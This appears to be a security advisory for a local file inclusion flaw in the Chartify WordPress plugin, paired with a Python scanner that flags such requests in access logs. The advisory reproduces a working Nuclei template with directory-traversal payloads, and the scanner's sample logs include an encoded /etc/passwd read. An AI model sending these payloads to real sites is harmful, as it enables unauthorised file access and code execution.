The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
PoC code [publicly available] (Nuclei template). The template chains two requests: the first includes the plugin's own featured-display file and only checks, via an internal matcher, that a PHPSESSID cookie comes back in the response headers; the second includes the plugin's uninstall file and is treated as a hit when the response is a 200 containing the plugin page markers "ays-chart-heading-box" and "View Documentation". Note that both 'source' values are passed without a file extension, which suggests the vulnerable include appends the .php suffix itself.
id: CVE-2024-10571

info:
  name: Chartify – WordPress Chart Plugin < 2.9.6 - Local File Inclusion
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
  reference:
    - https://plugins.trac.wordpress.org/browser/chart-builder/tags/2.9.6/admin/partials/charts/actions/chart-builder-charts-actions-options.php?rev=3184238
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/d4837258-c749-4194-926c-22b67e20c1fc?source=cve
    - https://github.com/RandomRobbieBF/CVE-2024-10571
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10571
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10571
    cwe-id: CWE-98,NVD-CWE-Other
    epss-score: 0.80868
    epss-percentile: 0.99116
    cpe: cpe:2.3:a:ays-pro:chartify:*:*:*:*:free:wordpress:*:*
  metadata:
    vendor: ays-pro
    product: chartify
    framework: wordpress
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/chart-builder/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,chartify,chart-builder,lfi,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chart_admin_ajax&function=display_plugin_charts_page&

    matchers:
      - type: word
        part: header
        words:
          - PHPSESSID
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/uninstall&type=chart-js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chart_admin_ajax&function=display_plugin_charts_page

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "ays-chart-heading-box", "View Documentation")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100c0dd2ea868dc5a516fe091228d493a9506d6f8b530e684f4a50dea4ac4086c33022100e2fb0ab94486a9418908ab5eaa1ffdd3e0fc2c84874aa5d72901ce834dac1729:922c64590222798bb761d5b6d8e72950
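For defenders, the distinctive part of the PoC is what lands in the query string of /wp-admin/admin-ajax.php: a 'source' value carrying directory traversal. The POST body (action=ays_chart_admin_ajax&function=...) is not written to ordinary access logs, so the query string is the signal to hunt on. The following Python is an added example, not code from the advisory, the Nuclei template or the plugin: it parses Combined Log Format lines, decodes nested percent-encoding, and flags admin-ajax.php requests whose 'source' contains traversal, an absolute path or a stream wrapper, marking the two exact PoC targets from the template as known-PoC. The log lines embedded in it are constructed for the example, not real traffic.

```python
"""Flag CVE-2024-10571-style LFI attempts in web-server access logs.

Added example, not part of the advisory or the Nuclei template. It keys on
what the public PoC puts in the query string of /wp-admin/admin-ajax.php:
a 'source' value containing directory traversal (or an absolute path or a
PHP stream wrapper). The POST body (action=ays_chart_admin_ajax&function=...)
does not appear in access logs, so it cannot be used as a signal here.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format (Apache/nginx default): ip - - [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# php://, data:, file:, expect:, ... (two or more scheme chars, so "C:\" is not a hit)
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)

# Paths the public PoC includes; both are relative to wp-content/plugins and
# lack the .php suffix, which the vulnerable include evidently appends.
POC_TARGETS = (
    "chart-builder/uninstall",
    "chart-builder/admin/partials/features/chart-builder-plugin-featured-display",
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of percent-encoding so %252e%252e%252f is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str):
    """Return a finding dict for a suspicious admin-ajax.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # parse_qs already unquotes once
    for raw in params.get("source", []):
        source = decode_fully(raw)
        reasons = []
        if TRAVERSAL_RE.search(source):
            reasons.append("traversal")
        if source.startswith(("/", "\\")):
            reasons.append("absolute-path")
        if WRAPPER_RE.match(source):
            reasons.append("stream-wrapper")
        if not reasons:
            continue
        return {
            "ip": m.group("ip"),
            "time": m.group("time"),
            "status": int(m.group("status")),
            "source": source,
            "reasons": reasons,
            # exact PoC payload: high confidence regardless of the status code
            "known_poc": any(source.endswith(t) for t in POC_TARGETS),
        }
    return None


def scan(lines):
    """Run classify() over an iterable of log lines and collect the findings."""
    return [f for f in (classify(line) for line in lines) if f]


# Constructed sample traffic (not real logs): two benign requests, the second
# PoC request as it appears in the template, and a double-encoded variant.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Nov/2024:10:15:01 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 62 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Nov/2024:10:15:04 +0000] "POST /wp-admin/admin-ajax.php?action=add&source=line&type=chart-js HTTP/1.1" 200 3044 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Nov/2024:10:16:32 +0000] "POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/uninstall&type=chart-js HTTP/1.1" 200 5120 "-" "curl/8.4.0"',
    '203.0.113.10 - - [12/Nov/2024:10:16:40 +0000] "GET /wp-admin/admin-ajax.php?action=add&source=%252e%252e%252f%252e%252e%252fetc%252fpasswd&type=chart-js HTTP/1.1" 200 1180 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 on the uninstall include is what the template's own matcher treats as confirmation, so a known-PoC finding with status 200 should be triaged as a likely successful read; anything else with traversal in 'source' is an attempt worth correlating by source IP. Requests that carry 'source' only in the POST body would be missed by this approach and need WAF or reverse-proxy logs that record bodies.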